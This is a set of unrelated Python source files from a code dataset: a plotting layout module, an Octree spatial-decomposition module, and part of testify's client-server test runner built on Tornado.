if ncol is not None and rel_widths is not None:
if ncol != rel_widths.shape[0]:
raise ValueError("ncol (potentially from the design) and "+\
"rel_widths disagree on size of layout")
if nrow is not None and rel_heights is not None:
if nrow != rel_heights.shape[0]:
raise ValueError("nrow (potentially from the design) and "+\
"rel_heights disagree on size of layout")
self.ncol = ncol
self.nrow = nrow
self.__design = design
self.byrow = byrow
self.rel_widths = rel_widths
self.rel_heights = rel_heights
self.num_grobs = self._assess_mat(design)
def _design_string_to_mat(self, design):
"""
Internal function to convert design string into a matrix
Arguments
---------
design : str
design in a string format
Returns
-------
design : np.array integer
design in np.array format
"""
design_clean = re.sub(" *\t*", "", design) # removing spaces and tabs
design_clean = re.sub("^\n*", "", design_clean) # remove leading nl
design_clean = re.sub("\n*$", "", design_clean) # remove following nl
row_info = re.split("\n", design_clean)
ncol_lengths = np.unique([len(x) for x in row_info])
if ncol_lengths.shape != (1,):
raise ValueError("expect all rows in design to have the same "+\
"number of entries, use # for an empty space "+\
"if using a string format.")
ncol = int(ncol_lengths)
nrow = len(re.findall("\n", design)) + 1
design = np.array([[ ord(val)-65
if not np.any([val == x for x in ["#","."]])
else np.nan
for val in r]
for r in row_info])
return design
def _get_design(self, num_grobs=None):
"""
create a design matrix if not explicit design has been provided
"""
if self.__design is not None:
return self.__design
if num_grobs is None:
if self.num_grobs is None:
raise ValueError("unclear number of grobs in layout...")
else:
num_grobs = self.num_grobs
if self.byrow is None or self.byrow:
order_str = "C"
else:
order_str = "F"
# if only ncol or nrow is defined...
ncol = self.ncol
nrow = self.nrow
if ncol is None:
ncol = int(np.ceil(num_grobs / nrow))
if nrow is None:
nrow = int(np.ceil(num_grobs / ncol))
inner_design = np.arange(ncol*nrow,
dtype = float).reshape((nrow, ncol),
order = order_str)
inner_design[inner_design >= num_grobs] = np.nan
_ = self._assess_mat(inner_design) # should pass since we just built it...
return inner_design
# property
design = property(_get_design)
"""
defines underlying ``design`` attribute (potentially defined relative to a
``cow.patch`` object if certain structure are not extremely specific.
"""
def _assess_mat(self, design):
"""
Assesses if the design matrix includes at least 1 box for patches
indexed 0 to (number of patches - 1). This doesn't actually assume to know
the number of patches.
Arguments
---------
design : np.array (integer)
design in numpy array format
Returns
-------
int
number of patches expected in the overall matrix.
Raises
------
ValueError
if design matrix doesn't include at least at least 1 box for all
indices between 0 to (number of patches - 1)
"""
if design is None:
return None # to identify later that we don't have a design matrix
unique_vals = np.unique(design)
unique_vals = np.sort(
unique_vals[np.logical_not(np.isnan(unique_vals))])
num_unique = unique_vals.shape[0]
if not np.allclose(unique_vals, np.arange(num_unique)):
raise ValueError("design input requires values starting "+\
"with 0/A and through integer/alphabetical "+\
"value expected for the number of patches "+\
"provided")
return num_unique
def _rel_structure(self, num_grobs=None):
"""
provide rel_structure (rel_widths, rel_heights) if missing
Arguments
---------
num_grobs : int
if not None, then this value will be used to understand the number
of grobs to be laid out
Returns
-------
rel_widths : np.array vector
a vector of relative widths of the columns of the layout design
rel_heights : np.array vector
a vector of relative heights of the rows of the layout design
"""
if num_grobs is None:
if not (self.ncol is not None and \
self.nrow is not None) and \
not (self.rel_widths is not None and \
self.rel_heights is not None):
raise ValueError("unclear number of grobs in layout -> "+\
"unable to identify relative width and height")
rel_widths = self.rel_widths
rel_heights = self.rel_heights
ncol = self.ncol
nrow = self.nrow
if rel_widths is not None and ncol is None:
ncol = rel_widths.shape[0]
if rel_heights is not None and nrow is None:
nrow = rel_heights.shape[0]
if ncol is None:
ncol = int(np.ceil(num_grobs/nrow))
if rel_widths is None:
rel_widths = np.ones(ncol)
if nrow is None:
nrow = int(np.ceil(num_grobs/ncol))
if rel_heights is None:
rel_heights = np.ones(nrow)
return rel_widths, rel_heights
def _element_locations(self, width_pt, height_pt, num_grobs=None):
"""
create a list of ``area`` objects associated with the location of
each of the layout's grobs w.r.t. a given points width and height
Arguments
---------
width_pt : float
global width (in points) of the full arangement of patches
height_pt : float
global height (in points) of the full arangement of patches
num_grobs : integer
if not ``None``, then this value will be used to understand the
number of grobs to be laid out
Returns
-------
list
list of ``area`` objects describing the location for each of the
layout's grobs (in the order of the index in the self.design)
"""
if self.num_grobs is None and num_grobs is None:
raise ValueError("unclear number of grobs in layout...")
if self.num_grobs is not None:
if num_grobs is not None and num_grobs != self.num_grobs:
warnings.warn("_element_locations overrides num_grobs "+\
"with self.num_grobs")
num_grobs = self.num_grobs
rel_widths, rel_heights = self._rel_structure(num_grobs=num_grobs)
areas = []
for p_idx in np.arange(num_grobs):
dmat_logic = self._get_design(num_grobs=num_grobs) == p_idx
r_logic = dmat_logic.sum(axis=1) > 0
c_logic = dmat_logic.sum(axis=0) > 0
inner_x_where = np.argwhere(c_logic)
inner_x_left = np.min(inner_x_where)
inner_x_right = np.max(inner_x_where)
inner_width = inner_x_right - inner_x_left + 1
inner_x_where = np.argwhere(r_logic)
inner_y_top = np.min(inner_x_where)
inner_y_bottom = np.max(inner_x_where)
inner_height = inner_y_bottom - inner_y_top + 1
inner_design_area = area(x_left = inner_x_left,
y_top = inner_y_top,
width = inner_width,
height = inner_height,
_type = "design")
areas.append(inner_design_area.pt(rel_widths=rel_widths,
rel_heights=rel_heights,
width_pt=width_pt,
height_pt=height_pt))
return areas
def _yokogaki_ordering(self, num_grobs=None):
"""
calculates the yokogaki (left to right, top to bottom) ordering
the the patches
Arguments
---------
num_grobs : integer
if not ``None``, then this value will be used to understand the
number of grobs to be laid out
Returns
-------
numpy array (vector) of integer index of plots in yokogaki ordering
Notes
-----
Yokogaki is a Japanese word that concisely describes the left to right,
top to bottom writing format. We'd like to thank `stack overflow`_.
for pointing this out.
.. _stack overflow:
https://english.stackexchange.com/questions/81520/is-there-a-word-for-left-to-right-and-top-to-bottom
"""
if self.num_grobs is None and num_grobs is None:
raise ValueError("unclear number of grobs in layout...")
if self.num_grobs is not None:
if num_grobs is not None and num_grobs != self.num_grobs:
warnings.warn("_element_locations overrides num_grobs "+\
"with self.num_grobs")
num_grobs = self.num_grobs
areas = self._element_locations(1,1) # basically getting relative positions (doesn't matter) - nor does it matter about rel_height and width, but ah well
all_x_left = np.array([a.x_left for a in areas])
all_y_top = np.array([a.y_top for a in areas])
index_list = np.arange(num_grobs)
yokogaki_ordering = []
# remember y_tops are w.r.t top axis
for y_val in np.sort(np.unique(all_y_top)):
given_row_logic = all_y_top == y_val
inner_index = index_list[given_row_logic]
inner_x_left = all_x_left[given_row_logic]
row_ids = inner_index[np.argsort(inner_x_left)]
yokogaki_ordering += list(row_ids)
return np.array(yokogaki_ordering)
def __hash__(self):
"""
Creates a 'unique' hash for the object to help with identification
Returns
-------
hash integer
"""
if self.num_grobs is None:
design_list = [None]
else:
design_list = list(self.design.ravel())
rw_list = [None]
if self.rel_widths is not None:
rw_list = list(self.rel_widths)
rh_list = [None]
if self.rel_heights is not None:
rh_list = list(self.rel_heights)
info_list = design_list + \
rw_list + rh_list +\
[self.ncol, self.nrow, self.num_grobs]
return abs(hash(tuple(info_list)))
def __str__(self):
return "<layout (%d)>" % self.__hash__()
def __repr__(self):
nrow_str = str(self.nrow)
if self.nrow is None:
nrow_str = "unk"
ncol_str = str(self.ncol)
if self.ncol is None:
ncol_str = "unk"
if self.num_grobs is None:
design_str = "*unk*"
else:
design_str = self.design.__str__()
rw_str = "unk"
if self.rel_widths is not None:
rw_str = self.rel_widths.__str__()
rh_str = "unk"
if self.rel_heights is not None:
rh_str = self.rel_heights.__str__()
out = "design (%s, %s):\n\n"% (nrow_str, ncol_str) +\
design_str +\
"\n\nwidths:\n" +\
rw_str +\
"\nheights:\n" +\
rh_str
return self.__str__() + "\n" + out
def __eq__(self, value):
"""
checks if object is equal to another object (value)
Arguments
---------
value : object
another object (that major or may not be of the layout class)
Returns
-------
boolean
if current object and other object (value) are equal
"""
# if value is not a layout...
if not inherits(value, layout):
return False
# if __design hasn't been specified on 1 but is on another
if (self.__design is None and value.__design is not None) or\
(self.__design is not None and value.__design is None):
return False
# accounting for lack of __design specification
design_logic = True
if self.__design is not None:
design_logic = np.allclose(self.design,value.design,equal_nan=True)
return design_logic and \
self.ncol == value.ncol and \
self.nrow == value.nrow and \
np.unique(self.rel_heights/value.rel_heights).shape[0] == 1 and \
np.unique(self.rel_widths/value.rel_widths).shape[0] == 1
class area:
def __init__(self,
x_left, y_top,
width, height,
_type):
"""
object that stores information about what area a ``patch`` will fill
Arguments
---------
x_left : float
scalar of where the left-most point of the patch is located (impacted
by the ``_type`` parameter)
y_top : float
scalar of where the top-most point of the patch is located (impacted
by the ``_type`` parameter)
width : float
scalar of the width of the patch (impacted by the ``_type``
parameter)
height : float
scalar of the height of the patch (impacted by the ``_type``
parameter)
_type : str {"design", "relative", "pt"}
describes how the parameters are stored. See Notes for more
information between the options.
Notes
-----
These objects provide structural information about where in the overall
arangement individual plots / sub arangments lie.
The ``_type`` parameter informs how to understand the other parameters:
1. "design" means that the values are w.r.t. to a design matrix
relative to the `layout` class, and values are relative to the rows
and columns units.
2. "relative" means the values are defined relative to the full size of
the canvas and taking values between 0-1 (inclusive).
3. "pt" means that values are defined relative to point values
See also
--------
layout : object that incorporates multiple area definitions to define
layouts.
"""
# some structure check:
self._check_info_wrt_type(x_left, y_top, width, height, _type)
self.x_left = x_left
self.y_top = y_top
self.width = width
self.height = height
self._type = _type
def _check_info_wrt_type(self, x_left, y_top, width, height, _type):
"""
some logic checks of inputs relative to ``_type`` parameter
Arguments
---------
x_left : float
scalar of where the left-most point of the patch is located
(impacted by the ``_type`` parameter)
y_top : float
scalar of where the top-most point of the patch is located
(impacted by the ``_type`` parameter)
width : float
scalar of the width of the patch (impacted by the ``_type``
parameter)
height : float
scalar of the height of the patch (impacted by the ``_type``
parameter)
_type : str {"design", "relative", "pt"}
describes how the parameters are stored. Options include
["design", "relative", "pt"]. See class docstring for more info
Raises
------
ValueError
if any of the first four parameters don't make sense with respect
to the ``_type`` parameter
"""
if _type not in ["design", "relative", "pt"]:
raise ValueError("_type parameter not an acceptable option, see"+\
" documentation")
if _type == "design" and \
not np.all([is_non_neg_int(val) for val in [x_left,y_top]] +\
[is_pos_int(val) for val in [width,height]]) :
raise ValueError("with _type=\"design\", all parameters must be "+\
"positive integers")
elif _type == "relative" and \
not np.all([is_proportion(val) for val in [x_left,y_top,
width,height]] +\
[is_positive(val) for val in [width,height]]):
raise ValueError("with _type=\"relative\", all parameters should"+\
" be between 0 and 1 (inclusive) and width and"+\
" height cannot be 0")
elif _type == "pt" and \
not np.all([is_non_negative(val) for val in [x_left,y_top]] +\
[is_positive(val) for val in [width,height]]):
raise ValueError("with _type=\"pt\", all x_left and y_top should"+\
" be non-negative and width and height should"+\
" be strictly positive")
def _design_to_relative(self, rel_widths, rel_heights):
"""
translates an area object with ``_type`` = "design" to area object
with ``_type`` = "relative".
Arguments
---------
rel_widths : np.array (vector)
list of relative widths of each column of the layout matrix
rel_heights : np.array (vector)
list of relative heights of each row of the layout matrix
Returns
-------
area object
area object of ``_type`` = "relative"
"""
rel_widths = rel_widths/np.sum(rel_widths)
rel_heights = rel_heights/np.sum(rel_heights)
x_left = np.sum(rel_widths[:(self.x_left)])
y_top = np.sum(rel_heights[:(self.y_top)])
width = np.sum(rel_widths[self.x_left:(self.x_left + self.width)])
height = np.sum(rel_heights[self.y_top:(self.y_top + self.height)])
rel_area = area(x_left=x_left,
y_top=y_top,
width=width,
height=height,
_type="relative")
return rel_area
def _relative_to_pt(self, width_pt, height_pt):
"""
translates an area object with ``_type`` = "relative" to area object
with ``_type`` = "pt".
Arguments
---------
width_pt : float
width in points
height_pt : float
height in points
Returns
-------
area object
area object of ``_type`` = "pt"
"""
return area(x_left = self.x_left * width_pt,
y_top = self.y_top * height_pt,
width = self.width * width_pt,
height = self.height * height_pt,
_type = "pt")
def pt(self,
width_pt=None,
height_pt=None,
rel_widths=None,
rel_heights=None
):
"""
Translates area object to ``_type`` = "pt"
Arguments
---------
width_pt : float
width in points (required if ``_type`` is not "pt")
height_pt : float
height in points (required if ``_type`` is not "pt")
rel_widths : np.array (vector)
list of relative widths of each column of the layout matrix
(required if ``_type`` is "design")
rel_heights : np.array (vector)
list of relative heights of each row of the layout matrix
(required if ``_type`` is "design")
Returns
-------
area object
area object of ``_type`` = "pt"
"""
if self._type == "design":
rel_area = self._design_to_relative(rel_widths = rel_widths,
rel_heights = rel_heights)
return rel_area.pt(width_pt = width_pt, height_pt = height_pt)
elif self._type == "relative":
return self._relative_to_pt(width_pt = width_pt,
height_pt = height_pt)
elif self._type == "pt":
return copy.deepcopy(self)
else:
raise ValueError("_type attributes altered to a non-acceptable"+\
" value")
def _hash(self):
"""
replacement function for ``__hash__`` due to equality conflicts
Notes
-----
required since we defined ``__eq__`` and this conflicts with the
standard ``__hash__``
"""
return hash((self.x_left, self.y_top,
self.width, self.height,
self._type))
def __str__(self):
return "<area (%d)>" % self._hash()
def __repr__(self):
out = "_type: " + self._type +\
"\n\nx_left: " +\
self.x_left.__str__() +\
"\ny_top: " +\
self.y_top.__str__() +\
"\nwidth: " +\
self.width.__str__() +\
"\nheight: " +\
self.height.__str__()
return self.__str__() + "\n" + out
def __eq__(self, value):
return type(self) == type(value) and \
np.allclose(np.array([self.x_left, self.y_top,
self.width, self.height]),
np.array([value.x_left, value.y_top,
value.width, value.height])) and \
self._type == value._type
| StarcoderdataPython |
102022 | '''
Classes to represent axis-aligned 3-D bounding boxes and 3-D line segments, and
to perform ray-tracing based on oct-tree decompositions or a linear marching
algorithm.
'''
# Copyright (c) 2015 <NAME>. All rights reserved.
# Restrictions are listed in the LICENSE file distributed with this package.
from .cytools.boxer import *
class Octree(object):
'''
An multilevel oct-tree decomposition of a three-dimensional space,
wherein each level has a Box3D root defining its limits, and contains
up to eight Octree children (each representing an octant of the root).
Leafy children (those children of level 0) can be added to the tree
recursively and need not be Box3D objects.
'''
def __init__(self, level, box):
'''
Construct an oct tree with a depth of level. The created tree
has a rootbox property that is a Box3D object with lo and hi
bounds copied from the provided Box3D box. For levels greater
than 0, the rootbox is subdivided into (2, 2, 2) octant cells.
Each octant cell will be the rootBox for one child, but
children are created lazily when leaves are added with the
Octree.addleaves.
When created, descendants will be accumulated in the children
property of this object. For levels greater than 0, children is
a dictionary that maps octant indices (i, j, k), where each
index can take the value 0 or 1, to an Octree instance that
represents a branch at (level - 1). For level-0 trees, children
is just a set of arbitrary objects.
'''
self.level = int(level)
if self.level != level:
raise TypeError('Argument level must be an integer')
if self.level < 0:
raise ValueError('Argument level must be nonnegative')
self.rootbox = Box3D(box.lo, box.hi)
# At level 0, children (leaves) are stored in a set
if self.level < 1:
self.children = set()
return
# Subdivide the root into octants
self.rootbox.ncell = (2, 2, 2)
# Children of nonzero levels are stored in a dictionary
self.children = { }
def prune(self):
'''
Recursively remove all children that, themselves, have no
children. For level-0 trees, this is a no-op.
'''
if self.level < 1: return
# Keep track of empty children
nokids = set()
for k, v in self.children.items():
# Prune the child to see if it is empty
v.prune()
if not v.children: nokids.add(k)
for idx in nokids:
try: del self.children[idx]
except KeyError: pass
def branchForKey(self, *key):
'''
Query this tree for the branch (an Octree object) identified by
the provided key. The key, which must be a sequence, can be
provided as unpacked arguments or as a single argument.
The length of the key must be a multiple of three. If the key
is empty, self is returned. If the key is not empty, it is
split as
child = key[:3]
subkey = key[3:]
and a recursive result is returned by calling
self.children[child].branchForKey(subkey).
If a branch for the given child key does not exist, but the
child key represents a valid octant, the branch is created.
If the child key does not represent a valid octant, either
because the key has a length other than 0 or 3, or because the
child key contains values other than 0 or 1, a KeyError will be
raised. At level 0, any nonempty key will raise a KeyError.
'''
# Treat a single argument as a packed index
if len(key) == 1: key = key[0]
try:
child = tuple(key[:3])
subkey = key[3:]
except TypeError:
raise KeyError('Single argument must be a sequence')
if not len(child): return self
if self.level < 1:
raise KeyError('Key length greater than tree depth')
elif len(child) != 3:
raise KeyError('Key length must be a multiple of three')
if set(child).difference({ 0, 1 }):
raise KeyError('Indices of key must be 0 or 1')
try: ctree = self.children[child]
except KeyError:
cbox = self.rootbox.getCell(*child)
ctree = Octree(self.level - 1, cbox)
self.children[child] = ctree
return ctree.branchForKey(subkey)
def addleaves(self, leaves, predicate, multibox=False):
'''
From the iterable leaves, populate the children of all level-0
branches in the Octree hierarchy according to the value of the
given predicate. If any branches are missing from the tree,
they will be created as necessary. Leaf objects must be
hashable.
The predicate must be a callable that takes two positional
arguments, box and leaf, and returns True iff the specified
Box3D box contains the leaf. The predicate will be called for
boxes at every level of the tree while drilling down.
If multibox is True, all level-0 boxes that satisfy the
predicate for a given leaf will record the leaf as a child.
Otherwise, only the first box to satisfy the predicate will own
the box. The tree is walked depth-first, with children
encountered in the order determined by Box3D.allIndices.
If no box contains an entry in leaves, that entry will be
silently ignored.
This method returns True if any leaf was added to the tree,
False otherwise.
'''
rbox = self.rootbox
added = False
for leaf in leaves:
# Check whether the leaf belongs in this tree
if not predicate(rbox, leaf): continue
if self.level < 1:
# Just add the children at the finest level
self.children.add(leaf)
added = True
continue
# At higher levels, try to add the leaf to children
for idx in rbox.allIndices():
# Grab or create a child tree
ctree = self.branchForKey(idx)
# Add the leaf to the child tree, if possible
if ctree.addleaves((leaf,), predicate, multibox):
added = True
if not multibox: break
return added
def mergeleaves(self, leaves):
'''
For each key-value pair leaves, a mapping from branch keys to
sets of leaf objects (in the same form produced by the method
Octree.getleaves), add all leaf objects in the set to the
level-0 branch indicated by the corresponding key.
A KeyError will be raised wihtout adding leaves if any keys
in the mapping fail to specify valid level-0 Octree branches.
Some intermediate branches may be added even if leaves are not
added, but the added branches will be empty in this case.
The same leaf object will be added to multiple level-0 branches
if the object is specified for multiple keys in the leaves
mapping.
'''
# Produce a list of (child, leaf-set) pairs for validation
bpairs = [ (self.branchForKey(key), set(lset))
for key, lset in leaves.items() ]
# Ensure all branches are at level 0
if any(branch.level for branch, lset in bpairs):
raise KeyError('Branch keys in leaves mapping must idenify level-0 children')
# Add all of the children
for branch, lset in bpairs: branch.children.update(lset)
def getleaves(self):
'''
Return a mapping from addresses to leaf sets such that, for a
key-value pair (key, leaves) in the mapping, the branch
returned by self.branchForkey(key) is a level-0 Octree and
self.branchForKey(key).children == leaves.
'''
if self.level < 1:
# At the lowest level, The address is empty
return { (): set(self.children) }
# Build the mapping up for all children
return { tuple(key) + ck: cv
for key, ctree in self.children.items()
for ck, cv in ctree.getleaves().items() }
def search(self, boxpred, leafpred=None, leafcache=None):
'''
Perform a depth-first search of the tree to identify matching
leaves. A leaf is said to match the search iff the value of
Boolean value of leafpred(leaf) is True and the Boolean value
of boxpred(box) is True for the level-0 box that contains the
leaf and for all of its ancestors.
The order in which children are followed is arbitrary.
The callable boxpred should take a single Box3D argument, which
will be the root of some branch of the Octree. If the Boolean
value of boxpred(box) for some box, the branch rooted on the
box will be further searched. Otherwise, searching will
terminate without checking descendants.
The optional callable leafpred should take as its sole argument
a leaf object previously assigned to the tree using the method
Octree.addleaves. If leafpred is not defined, the default
implementation returns True for every leaf.
If leafcache is provided, it must be a dictionary. When
attempting to match leaves in the search, the value of
leafcache[leaf] will be used as a substitute for the value of
leafpred(leaf) whenever possible. If leaf is not in leafcache,
the value leafpred(leaf) will be assigned to leafcache[leaf].
This capability is useful to avoid redundant match tests for
leaves added in "multibox" mode and guarantees that
leafpred(leaf) will be evaluated at most once for each leaf.
The return value will be a dictionary mapping all leaf objects
that match the search to the value returned by leafpred(leaf)
or leafcache[leaf].
'''
# Match is empty if the box predicate fails
if not boxpred(self.rootbox): return { }
if self.level > 0:
# Recursively check branches
results = { }
for ctree in self.children.values():
results.update(ctree.search(boxpred, leafpred, leafcache))
return results
# With no leaf predicate, all leaves match
if not leafpred: return { c: True for c in self.children }
# Otherwise, filter leaves by the leaf predicate
results = { }
for c in self.children:
if leafcache is not None:
try:
lp = leafcache[c]
except KeyError:
lp = leafpred(c)
leafcache[c] = lp
else: lp = leafpred(c)
if lp: results[c] = lp
return results
| StarcoderdataPython |
138133 | <filename>testify/test_runner_server.py
# vim: et ts=4 sts=4 sw=4
"""
Client-server setup to evenly distribute tests across multiple processes. The server
discovers all test classes and enqueues them, then clients connect to the server,
receive tests to run, and send back their results.
The server keeps track of the overall status of the run and manages timeouts and retries.
"""
from __future__ import with_statement
from test_runner import TestRunner
import tornado.httpserver
import tornado.ioloop
import tornado.web
try:
import simplejson as json
_hush_pyflakes = [json]
del _hush_pyflakes
except ImportError:
import json
import logging
import Queue
import time
import itertools
class AsyncDelayedQueue(object):
def __init__(self):
self.data_queue = Queue.PriorityQueue()
self.callback_queue = Queue.PriorityQueue()
self.finalized = False
def get(self, c_priority, callback, runner=None):
"""Queue up a callback to receive a test."""
if self.finalized:
callback(None, None)
return
self.callback_queue.put((c_priority, callback, runner))
tornado.ioloop.IOLoop.instance().add_callback(self.match)
def put(self, d_priority, data):
"""Queue up a test to get given to a callback."""
self.data_queue.put((d_priority, data))
tornado.ioloop.IOLoop.instance().add_callback(self.match)
def match(self):
"""Try to pair a test to a callback.
This loops over each queued callback (and each queued test)
trying to find a match. It breaks out of the loop as soon as
it finds a valid callback-test match, re-queueing anything it
skipped. (In the worst case, this is O(n^2), but most of the
time no loop iterations beyond the first will be necessary -
the vast majority of the time, the first callback will match
the first test).
"""
callback = None
runner = None
data = None
skipped_callbacks = []
while callback is None:
try:
c_priority, callback, runner = self.callback_queue.get_nowait()
except Queue.Empty:
break
skipped_tests = []
while data is None:
try:
d_priority, data = self.data_queue.get_nowait()
except Queue.Empty:
break
if runner is not None and data.get('last_runner') == runner:
skipped_tests.append((d_priority, data))
data = None
continue
for skipped in skipped_tests:
self.data_queue.put(skipped)
if data is None:
skipped_callbacks.append((c_priority, callback, runner))
callback = None
continue
for skipped in skipped_callbacks:
self.callback_queue.put(skipped)
if callback is not None:
callback(d_priority, data)
tornado.ioloop.IOLoop.instance().add_callback(self.match)
def empty(self):
"""Returns whether or not we have any pending tests."""
return self.data_queue.empty()
def waiting(self):
"""Returns whether or not we have any pending callbacks."""
return self.callback_queue.empty()
def finalize(self):
"""Immediately call any pending callbacks with None,None
and ensure that any future get() calls do the same."""
self.finalized = True
try:
while True:
_, callback, _ = self.callback_queue.get_nowait()
callback(None, None)
except Queue.Empty:
pass
class TestRunnerServer(TestRunner):
def __init__(self, *args, **kwargs):
self.serve_port = kwargs.pop('serve_port')
self.runner_timeout = kwargs['options'].runner_timeout
self.revision = kwargs['options'].revision
self.server_timeout = kwargs['options'].server_timeout
self.shutdown_delay_for_connection_close = kwargs['options'].shutdown_delay_for_connection_close
self.shutdown_delay_for_outstanding_runners = kwargs['options'].shutdown_delay_for_outstanding_runners
self.test_queue = AsyncDelayedQueue()
self.checked_out = {} # Keyed on class path (module class).
self.failed_rerun_methods = set() # Set of (class_path, method) who have failed.
self.timeout_rerun_methods = set() # Set of (class_path, method) who were sent to a client but results never came.
self.previous_run_results = {} # Keyed on (class_path, method), values are result dictionaries.
self.runners = set() # The set of runner_ids who have asked for tests.
self.runners_outstanding = set() # The set of runners who have posted results but haven't asked for the next test yet.
self.shutting_down = False # Whether shutdown() has been called.
super(TestRunnerServer, self).__init__(*args, **kwargs)
def get_next_test(self, runner_id, on_test_callback, on_empty_callback):
"""Enqueue a callback (which should take one argument, a test_dict) to be called when the next test is available."""
self.runners.add(runner_id)
def callback(priority, test_dict):
if not test_dict:
return on_empty_callback()
if test_dict.get('last_runner', None) != runner_id or (self.test_queue.empty() and len(self.runners) <= 1):
self.check_out_class(runner_id, test_dict)
on_test_callback(test_dict)
else:
if self.test_queue.empty():
# Put the test back in the queue, and queue ourselves to pick up the next test queued.
self.test_queue.put(priority, test_dict)
self.test_queue.callback_queue.put((-1, callback))
else:
# Get the next test, process it, then place the old test back in the queue.
self.test_queue.get(0, callback, runner=runner_id)
self.test_queue.put(priority, test_dict)
self.test_queue.get(0, callback, runner=runner_id)
def report_result(self, runner_id, result):
class_path = '%s %s' % (result['method']['module'], result['method']['class'])
d = self.checked_out.get(class_path)
if not d:
raise ValueError("Class %s not checked out." % class_path)
if d['runner'] != runner_id:
raise ValueError("Class %s checked out by runner %s, not %s" % (class_path, d['runner'], runner_id))
if result['method']['name'] not in d['methods']:
raise ValueError("Method %s not checked out by runner %s." % (result['method']['name'], runner_id))
if result['success']:
d['passed_methods'][result['method']['name']] = result
else:
d['failed_methods'][result['method']['name']] = result
self.failure_count += 1
if self.failure_limit and self.failure_count >= self.failure_limit:
logging.error('Too many failures, shutting down.')
return self.early_shutdown()
d['timeout_time'] = time.time() + self.runner_timeout
d['methods'].remove(result['method']['name'])
if not d['methods']:
self.check_in_class(runner_id, class_path, finished=True)
def run(self):
class TestsHandler(tornado.web.RequestHandler):
@tornado.web.asynchronous
def get(handler):
runner_id = handler.get_argument('runner')
if self.shutting_down:
self.runners_outstanding.discard(runner_id)
return handler.finish(json.dumps({
'finished': True,
}))
if self.revision and self.revision != handler.get_argument('revision'):
return handler.send_error(409, reason="Incorrect revision %s -- server is running revision %s" % (handler.get_argument('revision'), self.revision))
def callback(test_dict):
self.runners_outstanding.discard(runner_id)
handler.finish(json.dumps({
'class': test_dict['class_path'],
'methods': test_dict['methods'],
'finished': False,
}))
def empty_callback():
self.runners_outstanding.discard(runner_id)
handler.finish(json.dumps({
'finished': True,
}))
self.get_next_test(runner_id, callback, empty_callback)
def finish(handler, *args, **kwargs):
super(TestsHandler, handler).finish(*args, **kwargs)
tornado.ioloop.IOLoop.instance().add_callback(handler.after_finish)
def after_finish(handler):
if self.shutting_down and not self.runners_outstanding:
iol = tornado.ioloop.IOLoop.instance()
iol.add_callback(iol.stop)
class ResultsHandler(tornado.web.RequestHandler):
def post(handler):
runner_id = handler.get_argument('runner')
self.runners_outstanding.add(runner_id)
result = json.loads(handler.request.body)
try:
self.report_result(runner_id, result)
except ValueError, e:
return handler.send_error(409, reason=str(e))
return handler.finish("kthx")
def get_error_html(handler, status_code, **kwargs):
reason = kwargs.pop('reason', None)
if reason:
return reason
else:
return super(ResultsHandler, handler).get_error_html(status_code, **kwargs)
# Enqueue all of our tests.
for test_instance in self.discover():
test_dict = {
'class_path' : '%s %s' % (test_instance.__module__, test_instance.__class__.__name__),
'methods' : [test.__name__ for test in test_instance.runnable_test_methods()],
}
if test_dict['methods']:
self.test_queue.put(0, test_dict)
# Start an HTTP server.
application = tornado.web.Application([
(r"/tests", TestsHandler),
(r"/results", ResultsHandler),
])
server = tornado.httpserver.HTTPServer(application)
server.listen(self.serve_port)
def timeout_server():
if time.time() > self.last_activity_time + self.server_timeout:
logging.error('No client activity for %ss, shutting down.' % self.server_timeout)
self.shutdown()
else:
tornado.ioloop.IOLoop.instance().add_timeout(self.last_activity_time + self.server_timeout, timeout_server)
self.activity()
timeout_server() # Set the first callback.
tornado.ioloop.IOLoop.instance().start()
report = [reporter.report() for reporter in self.test_reporters]
return all(report)
def activity(self):
self.last_activity_time = time.time()
def check_out_class(self, runner, test_dict):
self.activity()
self.checked_out[test_dict['class_path']] = {
'runner' : runner,
'class_path' : test_dict['class_path'],
'methods' : set(test_dict['methods']),
'failed_methods' : {},
'passed_methods' : {},
'start_time' : time.time(),
'timeout_time' : time.time() + self.runner_timeout,
}
self.timeout_class(runner, test_dict['class_path'])
def check_in_class(self, runner, class_path, timed_out=False, finished=False, early_shutdown=False):
if not timed_out:
self.activity()
if 1 != len([opt for opt in (timed_out, finished, early_shutdown) if opt]):
raise ValueError("Must set exactly one of timed_out, finished, or early_shutdown.")
if class_path not in self.checked_out:
raise ValueError("Class path %r not checked out." % class_path)
if not early_shutdown and self.checked_out[class_path]['runner'] != runner:
raise ValueError("Class path %r not checked out by runner %r." % (class_path, runner))
d = self.checked_out.pop(class_path)
for method, result_dict in itertools.chain(
d['passed_methods'].iteritems(),
((method, result) for (method, result) in d['failed_methods'].iteritems() if early_shutdown or (class_path, method) in self.failed_rerun_methods),
):
for reporter in self.test_reporters:
result_dict['previous_run'] = self.previous_run_results.get((class_path, method), None)
reporter.test_start(result_dict)
reporter.test_complete(result_dict)
#Requeue failed tests
requeue_dict = {
'last_runner' : runner,
'class_path' : d['class_path'],
'methods' : [],
}
for method, result_dict in d['failed_methods'].iteritems():
if (class_path, method) not in self.failed_rerun_methods:
requeue_dict['methods'].append(method)
self.failed_rerun_methods.add((class_path, method))
result_dict['previous_run'] = self.previous_run_results.get((class_path, method), None)
self.previous_run_results[(class_path, method)] = result_dict
if finished:
if len(d['methods']) != 0:
raise ValueError("check_in_class called with finished=True but this class (%s) still has %d methods without results." % (class_path, len(d['methods'])))
elif timed_out:
# Requeue or report timed-out tests.
for method in d['methods']:
# Fake the results dict.
error_message = "The runner running this method (%s) didn't respond within %ss.\n" % (runner, self.runner_timeout)
module, _, classname = class_path.partition(' ')
result_dict = {
'previous_run' : self.previous_run_results.get((class_path, method), None),
'start_time' : time.time()-self.runner_timeout,
'end_time' : time.time(),
'run_time' : self.runner_timeout,
'normalized_run_time' : "%.2fs" % (self.runner_timeout),
'complete': True, # We've tried running the test.
'success' : False,
'failure' : False,
'error' : True,
'interrupted' : False,
'exception_info' : [error_message],
'exception_info_pretty' : [error_message],
'runner_id' : runner,
'method' : {
'module' : module,
'class' : classname,
'name' : method,
'full_name' : "%s.%s" % (class_path, method),
'fixture_type' : None,
}
}
if (class_path, method) not in self.timeout_rerun_methods:
requeue_dict['methods'].append(method)
self.timeout_rerun_methods.add((class_path, method))
self.previous_run_results[(class_path, method)] = result_dict
else:
for reporter in self.test_reporters:
reporter.test_start(result_dict)
reporter.test_complete(result_dict)
if requeue_dict['methods']:
self.test_queue.put(-1, requeue_dict)
if self.test_queue.empty() and len(self.checked_out) == 0:
self.shutdown()
def timeout_class(self, runner, class_path):
"""Check that it's actually time to rerun this class; if not, reset the timeout. Check the class in and rerun it."""
